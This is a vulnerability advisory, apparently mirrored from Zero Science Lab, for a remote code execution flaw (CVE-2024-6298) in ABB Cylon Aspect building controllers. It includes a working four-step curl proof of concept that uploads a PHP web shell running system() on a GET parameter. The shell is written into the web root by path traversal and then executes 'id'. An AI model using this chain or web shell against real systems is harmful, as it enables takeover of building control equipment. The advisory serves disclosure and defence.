Lucene search

K
zeroscienceGjoko KrsticZSL-2024-5828
HistorySep 23, 2024 - 12:00 a.m.

ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution

2024-09-2300:00:00
Gjoko Krstic
zeroscience.mk
74
abb cylon aspect
remote code execution
arbitrary file delete
zsl-2024-5828
system access
dos
vulnerability
gjoko

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS4

9.4

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H/AU:Y/U:Red/R:I/V:C/RE:H

AI Score

9.9

Confidence

High

Title: ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution
Advisory ID: ZSL-2024-5828
Type: Local/Remote
Impact: System Access, DoS
Risk: (5/5)
Release Date: 23.09.2024

Summary

ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

Description

The ABB BMS/BAS controller suffers from a remote code execution vulnerability. The vulnerable uploadFile() function in bigUpload.php improperly reads raw POST data using the php://input wrapper without sufficient validation. This data is passed to the fwrite() function, allowing arbitrary file writes. Combined with an improper sanitization of file paths, this leads to directory traversal, allowing an attacker to upload malicious files to arbitrary locations. Once a malicious file is written to an executable directory, an authenticated attacker can trigger the file to execute code and gain unauthorized access to the building controller.

Vendor

ABB Ltd. - https://www.global.abb

Affected Version

NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01

Tested On

GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
IntelĀ® Atomā„¢ Processor E3930 @ 1.30GHz
IntelĀ® XeonĀ® Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vendor Status

[21.04.2024] Vulnerability discovered.
[22.04.2024] Vendor contacted.
[22.04.2024] Vendor responds.
[02.05.2024] Working with the vendor.
[07.08.2024] Vendor releases version 3.08.02 to address this issue.
[23.09.2024] Uncoordinated public security advisory released.

PoC

abb_aspect_rce1.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
[3] https://nvd.nist.gov/vuln/detail/CVE-2024-6298
[4] https://packetstormsecurity.com/files/181803/ABB-Cylon-Aspect-3.08.01-Remote-Code-Execution.html

Changelog

[23.09.2024] - Initial release
[24.09.2024] - Added reference [4]

Contact

Zero Science Lab

Web: https://www.zeroscience.mk
e-mail: [email protected]

<html><body><p>ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: &lt;=3.08.01

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from a remote code execution
vulnerability. The vulnerable uploadFile() function in bigUpload.php
improperly reads raw POST data using the php://input wrapper without
sufficient validation. This data is passed to the fwrite() function,
allowing arbitrary file writes. Combined with an improper sanitization
of file paths, this leads to directory traversal, allowing an attacker
to upload malicious files to arbitrary locations. Once a malicious file
is written to an executable directory, an authenticated attacker can
trigger the file to execute code and gain unauthorized access to the
building controller.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5828
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php
CVE ID: CVE-2024-6298
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘  
ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ 
ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ 
ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ 
ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ 
ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ 
ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘                                                            
         ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ 
         ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘
         ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ 
         ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–’ā–“ā–ˆā–ˆā–ˆā–“ā–’ā–‘
         ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘
         ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘
         ā–‘ā–’ā–“ā–ˆā–“ā–’ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘ ā–‘ā–’ā–“ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–“ā–’ā–‘                                               
                                                                                                               

1.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&amp;key=251" \
&gt; -H "Cookie: PHPSESSID=25131337" \
&gt; -H "Content-Type: application/x-www-form-urlencoded" \
&gt; -d "<?php \r\nif ($_GET['j']) {\r\nsystem($_GET['j']);\r\n}\r\n?>"

2.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&amp;key=251" \
&gt; -H "Cookie: PHPSESSID=25131337" \
&gt; -H "Content-Type: application/x-www-form-urlencoded"

3.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=finish" \
&gt; -H "Cookie: PHPSESSID=25131337" \
&gt; -H "Content-Type: application/x-www-form-urlencoded" \
&gt; -d "key=251&amp;name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php"

4.
$ curl http://192.168.73.31/ZSL.php?j=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</p></body></html>

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS4

9.4

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H/AU:Y/U:Red/R:I/V:C/RE:H

AI Score

9.9

Confidence

High